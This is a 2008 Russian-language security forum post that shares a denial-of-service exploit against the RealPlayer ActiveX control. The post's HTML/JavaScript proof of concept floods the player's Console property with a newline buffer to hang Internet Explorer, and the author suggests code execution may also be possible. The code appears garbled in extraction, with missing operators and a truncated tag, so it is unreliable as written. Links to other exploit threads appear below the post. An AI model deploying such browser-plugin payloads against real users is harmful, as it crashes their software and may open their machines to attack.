HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу RealPlayer ActiveX Remote Denial of Service Exploit
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

RealPlayer ActiveX Remote Denial of Service Exploit
  #1  
Старый 12.03.2008, 21:12
Евгений Минаев
Познающий
Регистрация: 12.11.2007
Сообщений: 70
Провел на форуме:
1214722

Репутация: 676
По умолчанию RealPlayer ActiveX Remote Denial of Service Exploit
При запуске скрипта Интернет Эксплорер просто виснет и в последствие убивается через менеджер задач. Скорей всего возможно исполнение кода, по крайней мере автор не пробовал. Написано по эдвайсори Элазара Брода, техническое описание бага взято в чьем-то блоге.

PHP код:
<html>
    <head>
        <object classid='clsid:{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}' id='player'></object>
    </head>
    <body>
        <script type="text/javascript">
        
            if (player.GetMute() == false){
                var buffer "\x0a";
                var tempel 0;
                while (buffer.length 200buffer += "\x0a";
                for (temp 0temp 15;temp++){
                    tempel player.Console;
                    player.Console buffer+tempel;
                }
            } else {
                alert('No RealPlayer Found');
            }
            
        </script>
    </body>
</html
Последний раз редактировалось Евгений Минаев; 12.03.2008 в 21:18..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit TANZWUT Уязвимости CMS / форумов 4 10.06.2008 20:18
FireBird Remote Memory Corruption Exploit Евгений Минаев Уязвимости 0 09.03.2008 16:56
(Debug) Remote Password Change Exploit _-Mitiay-_ Уязвимости CMS / форумов 9 10.12.2007 22:50
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Rebz Уязвимости 4 28.02.2006 19:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ